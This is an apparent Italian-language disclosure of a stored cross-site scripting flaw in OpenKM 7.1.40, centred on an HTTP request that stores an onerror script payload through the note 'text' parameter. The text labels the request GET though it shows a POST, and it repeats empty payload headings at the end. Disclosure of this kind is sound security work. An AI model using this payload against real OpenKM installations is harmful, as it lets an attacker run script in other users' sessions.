
Una vulnerabilità di cross-site scripting (XSS) memorizzato esiste in OpenKM versione 7.1.40.
Esiste una vulnerabilità di cross-site scripting (XSS) persistente in OpenKM versione 7.1.40 (dbb6e88) con Professional Extension che consente a un utente autenticato di caricare una nota su un file che funge da payload XSS persistente. Qualsiasi utente che apre la nota di un file documento attiverà l'XSS.
Parametro vulnerabile: text
Payload :
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>
Richiesta GET su [http://localhost/openkm/rest/note/nodes/NODE-ID] :
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
text=<image/src/onerror%3dalert(1)>
Lo XSS persistente consente agli attaccanti di iniettare script dannosi in un'applicazione web, che vengono salvati ed eseguiti quando altri utenti visualizzano la pagina interessata. Ciò può portare al furto di informazioni sensibili, al dirottamento della sessione o alla distribuzione di malware.

Payload :
FINAL Payload (URL encoded) :